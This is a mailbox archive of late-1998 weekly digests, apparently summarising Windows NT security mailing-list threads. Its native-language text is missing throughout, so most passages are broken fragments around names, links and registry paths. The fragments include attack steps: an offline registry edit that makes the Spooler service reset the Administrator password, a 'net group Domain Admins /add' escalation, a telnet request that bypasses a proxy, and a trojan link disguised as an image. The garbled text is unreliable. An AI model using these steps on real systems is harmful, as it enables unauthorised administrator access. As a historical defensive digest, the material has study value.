,      My Computer  Network Neighborhood 
.  ,     

\Registry\Machine\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-
08002B30309D}[1 8 17] = REG_SZ "My Computer"
\Registry\Machine\Software\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-
08002B30309D}[1 8 17] = REG_SZ "Network Neighborhood"
\Registry\Machine\Software\Classes\CLSID\{FBF23B42-E3F0-101B-8488-
00AA003E56F8}[1 8 17] = REG_SZ "Internet Explorer"

Robert Bergin <RobertB@NH1-WSBINC.COM> (ntbugtraq) 
 .       
     ,  
     .

Mark Schmidt <roadwarrior@TECHIE.COM> (ntbugtraq) 
      
  .   
,       
,     ,   ,
     . Anthony C Eufemio
<anthony.eufemio@MEMCO.COM>     (SeOS
Access Control for NT, http://www.memco.com), ,   ,
     
.      
.

  , Benjamin Webb
<benrwebb@NETSCAPE.NET>,    
.     HKLM\Software\Classes
   ,    regedit,  
classes.reg,       
.    

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  add "regedit /s classes.reg",    ,  
       .

Luke Kenneth Casson Leighton <lkcl@SWITCHBOARD.NET> (ntbugtraq)
   ,    
   .    SAMBA 
,     
Windows NT   UNIX.

http://samba.org/cvs.html
-   
-  rpcclient ( ./configure,  make bin/rpcclient

   

http://samba.org/listproc/samba-technical/1777.html

3.    RPC

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,  
    

http://www.microsoft.com/security/bulletins/ms98-017.asp

   "  "   
RPC.    

Intel: NT Workstation, Server,  Enterprise Edition
<ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-
postSP4/nprpc-fix/nprpcfxi.exe>

   "James Strompolis"
<jimst@enteract.com> (ntsecurity, iss).

4.   SNMP

 Security Research Labs <seclabs@NAI.COM>,
http://www.nai.com (ntbugtraq)  ,  SNMP
"Windows NT SNMP Security Permissions".

  ,    SNMP  NT  
  .

     (community) SNMP
"public".        
    .       
 ,   ,  
 ,   

-  ,
-  ,
-   ,
-   ,
-     TCP  UDP,
-        IP-,
-    ARP-.

  Service Pack 4 (SP4)   
   READ ONLY, READ WRITE  READE CREATE.

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq) , 
     ,   
,     ISS scanner.   , 
    ,   SNMP, 
  

HKLM\System\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents

5.    IE4

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq)
,     ,    "The Son of
Cuartango Hole".     Cuartango Hole,
   Untrusted Scripted Paste, USB. 
     ,    
 .     

http://pages.whowhere.com/computers/cuartangojc/

        


http://www.microsoft.com/security/bulletins/ms98-015.asp

"James Strompolis" <jimst@enteract.com> (ntsecurity, iss) , 
    Q169245, Update available for "Untrusted
Scripted Paste" Issue,    

http://support.microsoft.com/support/kb/articles/q169/2/45.asp

6.    UDP 137

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
        UDP 137.
 , ,   ,    
.   MS Exchange Server 5.0  
  ESMTP,   AUTH LOGIN   
 . Netscape    , 
 AUTH LOGIN.  Netscape Mail Server  
  Microsoft Exchange Server,   
 EHLO.  Exchange    ESMTP,
Netscape   AUTH LOGIN. Exchange   
 ,    Event ID 4183   
   UDP 137.

 Meelis Roos <mroos@TARTU.CYBER.EE> (ntbugtraq) , 
   UDP 137     MSIE.

7.     
DNS

"Murdock, David V." <David.Murdock@NETWORKS.NET> (ntbugtraq)
    DNS  . 
      cache.dns, 
   DNS.      
   -      
.  ,       
 .        
cache.dns.        
 %SYSTEMROOT%\system32\dns\backup,   DNS 
    , , -, 
 DNS   .   
 ,    ,  
   cache.dns

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Para
meters]
 "AutoCacheUpdate"=dword:00000000

     SP4    
   cache.dns .

8.   IMAP  MS Exchange 5.5

"Krulewitch, Sean V" <krulewit@INDIANA.EDU> (ntbugtraq) (ntsecurity,
cooper)  ,  Exchange    
   IMAP.      Windows NT 
         .
  ,      

http://support.microsoft.com/support/kb/articles/q166/6/20.asp

9.    -

   ntsecurity (iss)   ,
       
    (" ").  
      -, 
       .

 Weld Pond <weld@l0pht.com> (ntsecurity, iss) , 
  " "   -
   Reverse WWW Shell. 
     HTTP  80   , 
        
    80 .    

http://www.genocide2600.com/~tattooman/thc/fw-backd.htm

,       
 Back Orifice.

"O'Neil Brooke" <obrooke@coba.net> (ntsecurity, iss)  
(http://www.hackcity.com),      
 " ".

10.    Samba

hurlock@aoml.noaa.gov (ntsecurity, iss) ,  ,  NT
    .  , 
       UNIX  
 Samba.

Michael Warfield <mhw@iss.net> (ntsecurity, iss) ,   
.   Samba    
.

Simon Clausen <sclausen@avirnex.com.au> (ntsecurity, iss) , 
,     

http://www.regedit.com/cgi-bin/detail?id=68

11.   Exchange  


Brian James Mulford <bmulford@acssys.com> (ntsecurity, iss) ,  
    Exchange  -
 Windows NT     .

"Timothy D. First" <firsttim@msu.edu>  Chris Lehr <ChrisL@tcginc.com>
(ntsecurity, iss) ,    ,  
.

"Larry Osterman \(Exchange\)" <larryo@exchange.microsoft.com> (ntsecurity,
iss) ,     ,  ,  
       Exchange,  
 Windows NT.   ,   
    ,   
.

12.   

Micheal Espinola Jr <micheale@IX.NETCOM.COM> (ntsecurity, cooper)
(ntsecurity, iss)   , ,   ,
 .

NT4
* (any Services, Protocols, Software, etc)
Client Server Tools
SP3
Routing and Remote Access Server
IE4
Exchange Server
Cluster Server
Message Queue Server
SQL Server
Option Pack
Proxy Server
SP4

13.   

Victor.DIAS-FERNANDES@DG12.CEC.BE (ntsecurity, cooper) 
  .     
   .    ,    
   .   ,
      
.

Jim Hackett <jim.hackett@YALE.EDU> (ntsecurity, cooper) 
  "Net Shift" ($200, www.montegonet.com).

"MarElia, Darren" <Darren.MarElia@SCHWAB.COM> (ntsecurity, cooper)
,    Zero Admin Kit
(http://www.microsoft.com/windows/zak)     
 runapp.exe.

Christopher Buono <buonoc@EARTHLINK.NET> (ntsecurity, cooper)
   MS KB Q143164.

14. CD 

Marco Peretti <mperetti@DIGITALWAVE.LU> (ntsecurity, cooper) 
  , SecureNT, http://www.digitalwave.lu,  
   CD-,

15.   SQL

Chris Lehr <ChrisL@tcginc.com> (ntsecurity, iss) ,   


HKLM\SOFTWARE\MICROSOFT\MSSQLSERVER\SQLEW\REGISTERED
SERVERS

   SA   .  View/Display
Binary data   ,    64  
,  0x00.

"akbal" <akbal@visualnet.com.br> (ntsecurity, iss) , ,  
,     SQL ,  MSSQL
enterprise manager.

*********************************************************
   Sunbelt (http://www.sunbelt-software.com).

      
 Windows 2000 (W2K).

      
  .

  Butler Group,    Novell,  6289
    .

1) Novell      . 72.8
  ,  NetWare     
   .

2) 27.2     NT   
 .

3) 21.3    Netware  NT.

 Novell ,      3.8 
 Netware  79  ,      Microsoft
 2.2   NT  44  .

,    IBM  International Data Corp
 849   (Denmark, France, Germany, Italu, UK),
  .

1) 89%     Win NT   12


2)  80%       
   . 10%  
 NT.

3) 61%  ,     
  NT   12  ( , 39%  
    NT)

4) 70%  NT      23% 
NT   ,     .

IBM   "Netfinity Performance Tuning with Windows NT
4.0",     

http://www.redbooks.ibm.com (     5287).

     NT  


http://www.tools4nt.com/Products/UserManagemeNT/UserManagemeNT.htm




From rudnyi@td.chem.msu.su Mon Nov 30 17:29:44 1998
Received: from td.chem.msu.su (td.chem.msu.su [158.250.32.41])
	by comp.chem.msu.su (8.9.1/8.9.1) with SMTP id RAA09246;
	Mon, 30 Nov 1998 17:29:34 +0300 (MSK)
Resent-Date: Mon, 30 Nov 1998 17:29:34 +0300 (MSK)
Received: from comp.chem.msu.su (unverified [158.250.32.40]) by td.chem.msu.su
	(EMWAC SMTPRS 0.83) with SMTP id <B0000005235@td.chem.msu.su>;
	Mon, 30 Nov 1998 17:32:32 +0300
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA08993
	for security@td; Mon, 30 Nov 1998 17:28:35 +0300 (MSK)
Message-Id: <199811301428.RAA08993@comp.chem.msu.su>
Subject: add-on to digest
To: security@td.chem.msu.su
Date: Mon, 30 Nov 1998 17:28:35 +0300 (MSK)
From: security@training.ru
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
X-MIME-Autoconverted: from 8bit to base64 by comp.chem.msu.su id RAA08993
Sender: security-request@td.chem.msu.su
Resent-Message-Id: <B0000005236@td.chem.msu.su>
Resent-From: security@td.chem.msu.su
X-Unsub: To leave, send text 'LEAVE' to <security-request@td.chem.msu.su>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by comp.chem.msu.su id RAA09246
Status: RO

 ,        
 :)


21-22  1998 .      
"    Windows NT".    
      (270 ..),   
  info@training.ru,  (095) 112-2333   
(095) 115-6001.

   
http://www.training.ru/security/


From rudnyi Sun Dec  6 21:48:21 1998
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id VAA03101
	for rudnyi@comp.chem.msu.su; Sun, 6 Dec 1998 21:48:20 +0300 (MSK)
Date: Sun, 6 Dec 1998 21:48:20 +0300 (MSK)
Message-Id: <199812061848.VAA03101@comp.chem.msu.su>
Subject: digest 23-29.11.98
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: O

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

23 - 29  1998 

   

      "    
Windows NT",      21-22  1998 .
          
(270 ..),      info@training.ru,
  (095) 112-2333    (095) 115-6001.

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

  (digital signature) -  , 
       
.

       (. ).

                                          ()
ntbugtraq                           19                            64    
ntsecurity (Cooper)                46                             80
ntsecurity (iss)                    27                            60
ntsecurity (wwa)                     1                             5

    .

1.   Service Pack 4.0

Firstname Lastname <bruno.zumella@BNPGROUP.COM> (ntbugtraq) 
       SP4

ARTICLE : Q195725
TITLE :        Intermediate Network Driver Causes STOP 0x0000001E on MP 
PC

"Elezer Puglia, Jr." <epuglia@MAIL.EUNET.PT> (ntsecurity, cooper) 
,    SP4    
pcANYWHERE V8.        
.    pcANYWHERE V8   
  SP4   .   
 NT.  Alain LOUBERT <aloubert@INAME.COM> 
(ntsecurity, cooper)    .     
.

Alain LOUBERT <aloubert@INAME.COM> (ntsecurity, cooper) ,  
  SP4   Security Explorer  
SmallWonders.       3.04, 
     SP4.

2.    UDP 137

  ,    UDP 137, 
 Windows NT.

Rick LeMarr <RLEMARR@PROMUS.COM> (ntbugtraq)  
 ,    Technet.

 Windows Sockets   gethostbyaddr()  
     IP-.   
  

1)    hosts.
2)      DNS,      
.
3)    NetBIOS Adapter Status Request   IP-
,       .  
  'nbtstat -A addr',     
 udp   137.

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   
 ,     ,   . 
   ,   UDP 137    
    IP-.     
,  MS Exchange Server 5.0    ESMTP, 
    AUTH LOGIN,       
.

3.  TCP SYN

Ian Watson <Ian@DTM.BC.CA> (ntbugtraq) ,    
   TCP (sequence numbers),     
TCP SYN.

Erich Siedler <erich.siedler@OMNINET.COM.BR> (ntbugtraq) ,  
  TCP      TCP SYN.    
      KB Q142641  

http://support.microsoft.com/support/kb/articles/q142/6/41.asp?FR=0

     ,    TCP SYN

ftp://info.cert.org/pub/cert_advisories/CA-96.21.tcp_syn_flooding

http://www.cyber.com.au/cyber/product/ipfilter/mail_list/1997-
05/msg00151.html

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq)   
   

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-
postSP1/syn-attack/q142641.txt

4.    

Craig Huckabee <huck@CS.WISC.EDU> (ntbugtraq) ,  
NetWkstaUserEnum      
 Windows NT.    ,  
   .

 A     .    
B.     NetWkstaUserEnum ,    
   A  B.

Sergey Sorokin <sergey@TVERSU.RU> (ntbugtraq)   .

Luke Kenneth Casson Leighton <lkcl@SWITCHBOARD.NET> (ntbugtraq) 
,      ,    
        , 
 IPC$,     .

5. S/MIME

"Colman, Clem" <Clem.Colman@DVA.GOV.AU> (ntsecurity, cooper) 
  ,   S/MIME, .
DES 56 ,   DES, Microsoft MAPI,  API  
  ,   x.509 (1024 ). 
 ,     .

1.  MailSecure from Baltimore Technologies
http://www.baltimoreinc.com/products/mailsecure/index.html

2.  WorldTalk  http://www.worldtalk.com

3.  Multi-Crypto ArmorMail from LJL Enterprises http://www.ljl.com

4.  Entrust Express from Entrust
http://www.entrust.com/express/description.htm

5.  Netscape Communicator from Netscape http://www.netscape.com (I
presume)

6.  TrustedMIME from Secure Solutions Experts (Siemens)
http://www.sse.ie/tm_features.html

7.  OpenSoft ExpressMail from OpenSoft http://www.opensoft.com

6. Lock Workstation

Chris LaMont [mailto:clamont@EXCHANGE.ABTCAMPUS.COM] 
(ntsecurity, cooper) ,    .

1.   NT (Lock workstation)
2.    ctl-shift-esc.
3.   NT (Unlock workstation).
4.      .

7. SU

Steven <steven@PRIMACOMPUTER.COM> (ntbugtraq)   
,    SU  Resource Kit Windows NT. 
     
      ,  
    SU   
.      ,   
 ,     
    (   
)     .

       SU   
    .      
 ,  ,    
         
   ,     
.    .   
 SU     ,   
     net group "Domain Admins" steven 
/add,    .        
   ,  ...

8.   NT   


David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper)  
  ,      
Windows NT Terminal Edition.     
   

HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList

        %systemroot%\profiles.  
      .  
 ,       , 
  .     
    ...

9.     


Ottenbacher Hajo <hajo.ottenbacher@EROWA.COM> (ntsecurity, cooper) 
,       
   NT.

"Gayler, David" <dgayler@BINDVIEW.COM> (ntsecurity, cooper) , 
        NT.  
       (Security 
Descriptor),     SID ,   
    .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper) 
,        security configuration 
manager  SP4.

10.     GIF

Kern Rose <Kern.Rose@ncmail.net> (ntsecurity, iss) ,    


http://members.tripod.com/~SpamCanners/trojans.htm

     -. 
,        GIF  
JPG. 

Dirk_Helgemo@datacard.com (Dirk Helgemo) (ntsecurity, iss) ,   
JPG      .

"Posick, Steve" <posicks@espn.com> (ntsecurity, iss) ,  ,  
 ,       

<a href="trojan.exe"><img src="SomePretty.Gif"></a>

     - .   
,        GIF  JPG.

Jeff Rader <raderj@raptors.dunimas.com>  Troy <troyhoffman@bigfoot.com> 
(ntsecurity, iss)     .  
http://kumite.com/myths/       GIF/JPG.

11.  "    
  "

"Rob Slade, doting grandpa of Ryan and Trevor" <rslade@sprint.ca> 
(ntsecurity, wwa)    

"The Information Systems Security Officer's Guide", Gerald L.
Kovacich, 1998, 0-7506-9896-9
%A   Gerald L. Kovacich
%C   225 Wildwood Street, Woburn, MA  01801
%D   1998
%G   0-7506-9896-9
%I   Butterworth-Heinemann/CRC Press/Digital Press
%O   800-366-BOOK fax: 800-446-6520 liz.mccarthy@repp.com
%P   172 p.
%T   "The Information Systems Security Officer's Guide"

  ,      
         
 .

12.     
 

 ,   Cheyenne ArcServe  Exchange Agent 2.0 
  exchverify.log,       
 . Tracey Holland <Tracey.Holland@RADIOLOGY.MSU.EDU> 
(ntbugtraq) ,     ,    ,   
    .

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
 .  Computer Associates, Inc.     
      exchverify.log,  
  ArcServe Exchange Agent  Innoculan Exchange 
Agent,  .    
 ntbugtraq ,     ,  
     . ,  
 ,       .

**************************************************
   Sunbelt (http://www.sunbelt-software.com)

 InfoWorld Annual Salary Survey -  .   
      $65669 
 .

http://www.infoworld.com/cgi-bin/displayCareers.pl?98entcar.welcome.htm

  NT 4.0    NT 5.0 (W2K).  
,    ,     
   DirectX6   3D-. 

NT Server 4.0EE      .   


http://www.dhbrown.com/pdfs/osscorecard.html

   TRUSTED ENTERPRISE MANAGER 
(http://www.sunbelt-software.com/tem.htm)

      Y2K (Year 
2000) (http://www.sunbelt-software.com/yes2k.htm).

  AUTOPILOT   SP4 (http://www.sunbelt-
software.com/autoplt.htm).


From rudnyi Sat Dec 12 21:52:08 1998
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id VAA27020
	for rudnyi@comp.chem.msu.su; Sat, 12 Dec 1998 21:52:08 +0300 (MSK)
Date: Sat, 12 Dec 1998 21:52:08 +0300 (MSK)
Message-Id: <199812121852.VAA27020@comp.chem.msu.su>
Subject: digest 30.11-6.12.98
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: O

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

30  - 6  1998 

   

         .

news://www.training.ru/ntsec -    , 
    Windows NT.

news://www.training.ru/ntsec.book -  ,   
 "     Windows NT": 
, , ,   .

news://www.training.ru/ntsec.sp4 -  ,   
   SP4.

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

 (hashing) -    
.        
   .

   .

                                          ()
ntbugtraq                           31                            64    
ntsecurity (Cooper)                 32                             48
ntsecurity (iss)                    18                            47
ntsecurity (wwa)                     0                             0

    .

1.     Windows 
NT,    

Fernando Callender <fcallender@BEARROCK.COM> (ntbugtraq)   


http://www.zdnet.com/pcweek/stories/news/0,4153,374497,00.html)

  ,         
Windows NT.

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,     
      () 
,        (. , 
http://ntbugtraq.ntadvice.com/page_archives_wa.asp?A2=ind9704&L=ntbugtra
q&F=P&S=&P=14066),       
  RestrictAnonymous=1 
(http://support.microsoft.com/support/kb/articles/q143/4/74.asp).

Ryan Russell <Ryan.Russell@SYBASE.COM>  Luke Kenneth Casson 
Leighton <lkcl@SWITCHBOARD.NET>(ntbugtraq)  ,  
  RestrictAnonymous   100% .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq) ,  
      

   NetUserEnum()
   NetGroupEnum() (    )
   NetUserModalsGet()
   NetShareEnum()
(      
 RestrictAnonymous, SP4)

      NetServerTransportEnum().

        
LSA.

C    David LeBlanc    
 .

Eric Allred <eallred@MICROSOFT.COM> (ntbugtraq) ,  
     sid2user  user2sid 
(.  -       
       , . 
http://www.chem.msu.su/~rudnyi/NT/).

Dominique Brezinski <dom_brezinski@SECURECOMPUTING.COM> 
(ntbugtraq)       , 
  ,      ,   
 .

Scott Field <sfield@MICROSOFT.COM> (ntbugtraq) ,   
Windows 2000     
restrictanonymous=2,       
LSA  SAM   .

Micheal Espinola Jr <micheale@IX.NETCOM.COM> (ntsecurity, cooper) 
,          
 

Root Key : HKEY_ LOCAL_MACHINE
Subkey   : \SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
Value    : RestrictNullSessAccess (NOT RestrictNullSessionAccess)
Type     : REG_DWORD
Data     : 1  0

   Micheal Espinola   , 
  NetBIOS, (137  139, TCP  UDP).

Glenn Larsson <glenn.larsson@DATORTEK.VASTERAS.SE> (ntsecurity, 
cooper) ,     RestrictAnonymous,  
      .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper) 
,     RestrictAnonymous   
  (trusting domain)      
   (trusted domain)   
  .

2.       
Winlogon

russell.osterlund@ZURICH.COM (ntbugtraq) ,     
Winlogon    Win32   
  "lMprNotifyUserName=3Dxxxx"  
"lMprNotifyPassword=3Dyyyy",  "xxxx" -  ,  "yyyy" -  
.

Maxim Shatskih <maxim@VEST.MSK.RU> (ntbugtraq) ,   
  Winlogon   ,  
       LSASS.

,   ,      
,  ,       .

David LeBlanc <dleblanc@MINDSPRING.COM>  Raphael Barber 
<RaphaelB@FCCTI.CO.UK>(ntbugtraq)    
 .

3.    SP4

Firstname Lastname <bruno.zumella@BNPGROUP.COM> (ntbugtraq) 
      SP4

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-
postSP4/Clik-fix/

DOCUMENT:Q195540
TITLE   :Windows NT 4.0 Does Not Recognize ATAPI Iomega Clik 40! Drive

4.    IIS  
 NCSA

Larry Budd <larry@ISERV.NET> (ntbugtraq) ,   SP4  
 IIS   NCSA     
.

206.114.47.26 - - [27/Oct/1998:13:53:23 -0500] "GET /Default.htm 
"HTTP/1.1" 200 740

     ,   
.

5.   TCP

Ian Watson <Ian@DTM.BC.CA> (ntbugtraq) ,   SP4  
     TCP (initial 
sequence numbers).

6. Security Configuration Manager

"Ahearn, Shawn" <shawn.ahearn@SYLVANIA.COM> (ntbugtraq)   
,    SCM -    
  Security.    

http://support.microsoft.com/support/kb/articles/q195/5/09.asp

Larry Swisher <larry@APTEK.COM> (ntbugtraq)  Security 
Configuration Manager       

Compws4.inf - Compatible Workstation
Off97SR1.inf - MS Office 97-SR1 Compatible

   Outlook 98,     
,       
 (group address).

7.   

Demetrius Metsos <demet@global.co.za> (ntsecurity, iss)   
     .

1)     NT   . ,  
 C:\WINNT,   C:\WINEMRG. 
2)     NT.
3)    SRVANY.EXE  Resource Kit  C:\TEMP.
4)   REGEDT32.EXE.   
HKEY_LOCAL_MACHINE    Load Hive.   
 C:\WINNT\SYSTEM32\CONFIG\SYSTEM,    
 DomainSystem.
5)    
HKEY_LOCAL_MACHINE\DomainSystem\ControlSet001\Services\
 Spooler\ImagePath  C:\TEMP\SRVANY.EXE.
6)       
HKEY_LOCAL_MACHINE\DomainSystem\ControlSet001\Services\
 Spooler\Parameters:
 Name: Application
 Type: REG_SZ
 Value: C:\WINNT\SYSTEM32\NET.EXE
 Name: AppParameters
 Type: REG_SZ
 Value: user Administrator newsecret (    
).
7)     NT.      
administrator c  .

8.   NTSAfe

 Internet Dynamics      
    NT.    

http://www.conclave.com/ntsafe

9.    IIS

Maxim Shatskih <maxim@VEST.MSK.RU> (ntbugtraq)  
 .   ,     
Submit,    ,     ,  
 15        IIS.   
          30 
.   ,     
ServerListenBackLog  ServerSize.

10. L0phtcrack

Alexander Kernozhitsky <AVK@peterburgstroy.ru> (ntsecurity, iss) , 
 L0phtcrack    ,  .

Weld Pond <weld@l0pht.com> (ntsecurity, iss) ,  L0phtcrack 
    ,    , 
   http://www.l0pht.com/l0phtcrack/faq.html.

11.  

Gregor Mosheh, B.S." <mosheh@POST.NET> (ntsecurity, cooper) , 
     .

"Jesper M. Johansson" <jesper.m.johansson-1@UMN.EDU> (ntsecurity, 
cooper)   PASSFILT.DLL,   
   Q161990  Q151082.

12.     
 

        
 ARCserve/Inoculan Exchange Agent.   
"Linton, Brian" <linbr06@MAIL.CAI.COM> ,     
     1(800) 645-3042.

********************************************************
   Sunbelt

    ,  SP4

http://www.microsoft.com/ntserver/nts/downloads/recommended/ntkit

  Intellimouse,    SP4  

http://www.microsoft.com/msdownload/intellipoint/22c/intellieng.asp

 ,    NT  
 

http://www.sunbelt-software.com/downlibr.htm


From rudnyi Sun Dec 20 22:45:24 1998
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id WAA00925
	for rudnyi@comp.chem.msu.su; Sun, 20 Dec 1998 22:45:23 +0300 (MSK)
Date: Sun, 20 Dec 1998 22:45:23 +0300 (MSK)
Message-Id: <199812201945.WAA00925@comp.chem.msu.su>
Subject: digest 7-13.12.98
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

7 - 13  1998 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

   (access control list, ACL) -   
 .     , 
    ,    
 ,     .

   .     
 .

                                          ()
ntbugtraq                           10                            25    
ntsecurity (Cooper)                34                             59
ntsecurity (iss)                    27                            79
ntsecurity (wwa)                     0                             0

    .

1.   EXCEL 97

Marc Bejarano <marc@DELTA-GLOBAL.COM> (ntbugtraq)   
   EXCEL 97,     CALL.

MICROSOFT EXCEL 97 "CALL VULNERABILITY": PATCH AVAILABLE 
THIS WEEK <http://officeupdate.microsoft.com/>

    ,   EXCEL   
 CALL,      . 
  ,       
      
.

Vesselin Bontchev <bontchev@COMPLEX.IS> (ntbugtraq) ,   
    EXCEL 95.

Scott Moore <smoore@iss.net> (ntsecurity, iss)   
.

Microsoft Knowledge Base (KB) article Q196791,
XL97: Patch Available for Excel CALL Vulnerability,
http://support.microsoft.com/support/kb/articles/q196/7/91.asp

http://officeupdate.microsoft.com/downloadDetails/xl97cfp.htm

Microsoft Security Bulletin 98-018, Patch Available for Excel
"Call Vulnerability" (the Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms98-018.asp.

2.   

Mike Lonergan <mike@OPENTEXT.COM> (ntbugtraq)  
 ,    SP4.   
 

net use * \\names.server.com\share

 

Start, Run, \\names.server.com\share

       15 
.   SP4   .  DNS 
   (, nslookup names.server.com)  .

   .  NT SP4  
  names.server.com    WINS-,  
 ,     DNS-. 
 ,   WINS-    
     names.server.com,   
  DNS-    names.server.co

3.    Microsoft's 
Network Monitor

mnemonix <mnemonix@GLOBALNET.CO.UK> 
http://www.infowar.co.uk/mnemonix/ (ntbugtraq) (ntsecurity, iss)   
      Network Monitor ( 
  NT,   SMS).       
NETBIOS,   NetBIOS Scope ID    190 , 
       :  
 ,  page fault,      
 .   mnemonix,  
   netbios.dll.

4.    

Dominique Brezinski <dom_brezinski@SECURECOMPUTING.COM> 
(ntbugtraq)    ,   
.

"The Inevitability of Failure: The Flawed Assumption of Security in Modern 
Computing Environments"

http://www.jya.com/paperF1.htm
http://csrc.nist.gov/nissc/1998/proceedings/paperF1.pdf

5.    

Forest, Denise (ntsecurity, cooper) ,      
  6  8 ,       
    400  .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper) 
,         Lan Manager,  
  7     P6-200   .

 				

  (   )	1 
                             1 

    ,   , 
    .

David LeBlanc    ,  
     .

kboyle <kboyle@SRIC.SRI.COM> (ntsecurity, cooper) ,    300 
Mhz Pentium II  L0phtCrack 2.02  30   
  ,    64    
 ,  13 .

       (  26 
),      .

6.     

BRUNO ZUMELLA <bzumella@USA.NET> (ntbugtraq)    


ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-
postSP4/Sms-fix/

DOCUMENT:       Q196270
TITLE   :       SNMP Agent Leaks Memory When Queried

7.    SMNP

Phil Cox <pcc@LLNL.GOV> (ntsecurity, cooper) ,    
   SMNP.

"Harmer, Michael E." <harmer@UDRI.UDAYTON.EDU> (ntsecurity, cooper) 
,       LanManager (OID 
1.3.6.1.4.1.77.1.2.25).

8.    

Razvan Peteanu <rpeteanu@INTERLOG.COM> (ntsecurity, cooper) , 
        .

Markus Doehr <doehrm@AUBI.DE> (ntsecurity, cooper) ,   
 "Webtrends Security Scanner" http://www.webtrends.com/wss.

Brian Koref <briank@CONXION.NET> (ntsecurity, cooper) ,    
  ISS Scanner (iss.net).

**********************************************************
   Sunbelt (http://www.sunbelt-software.com)

WINDOWS NT FAQ    http://www.ntfaq.com

   Exchange    AutoPilot 
   

http://www.tuningandsizingnt.com/article4.htm

      NT  
:

1) Trusted Enterprise Manager: Granular User Management delegation.
2) Storage Resource Manager: Browser based, SQL-driven, enterprise disk 
   management with thresholds, alerts, graphs, and a whole lot more.
3) Diskeeper: Still the leading disk defragger.
4) Convoy Cluster Software: Fault tolerance for mission critical websites
5) Double-Take: File mirroring and fail-over for mission critical servers
6) Quota Advisor: Hard disk quota tool that does user and object quotas.

      Sunbetl.

INFOWORLD    ,  
 NT.    ImageCast IC3.

http://www.infoworld.com/cgi-bin/displayTC.pl?/981116comp.htm

    SP4   

www.nthelp.com/nt4sp4.htm


From rudnyi Sun Dec 27 22:12:28 1998
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id WAA07250
	for rudnyi@comp.chem.msu.su; Sun, 27 Dec 1998 22:12:27 +0300 (MSK)
Date: Sun, 27 Dec 1998 22:12:27 +0300 (MSK)
Message-Id: <199812271912.WAA07250@comp.chem.msu.su>
Subject: digest 14-20.12.98
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

14 - 20  1998 

   training.ru.

         : 
    8       
  - !

   http://www.training.ru/HappyNewYear.htm

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

  (certification authority) - , 
       
     .

    .  17    
    ntsecurity@listserv.ntbugtraq.com.  
      Russ Cooper.

    .

1.     
MS Proxy 2.0

mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
  , ,   ,  
     .

  MS Proxy 2.0       , 
 "" (clean),      . 
 ,   ,  "" (dirty). 
   ,  ,  
    .

  MS Proxy 2.0   80   , 
    Proxy   "",  
.       
80       "" . 
       "" 
       IP- 
"" .      80  
  telnet    

"GET http://some.protected.machine.on.the.clean.side:port/ =
HTTP/1.0<enter><enter>"

        
  .

    ,    
,       .   
 -   IP.    
  ,         
   IP-.

    .

        80   
" ".   ,    
       (Web Proxy 
Properties -> Publishing -> Enable Publishing -> Send to local Server).

  .   ,    
          
   .

  route -f.

      
http://www.infowar.co.uk/mnemonix/

2. Remote Explorer

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
   ,    Windows NT,

    

Microsoft's statement:
http://www.microsoft.com/security/bulletins/remote.asp

NAI's claims:
http://www.nai.com/products/antivirus/remote_explorer.asp

News.com's coverage:
http://www.news.com/News/Item/0,4,30200,00.html?st.cn.nws.rl.ne
http://www.news.com/News/Item/0,4,30167,00.html?st.ne.lh..ni

ZDNet's coverage:
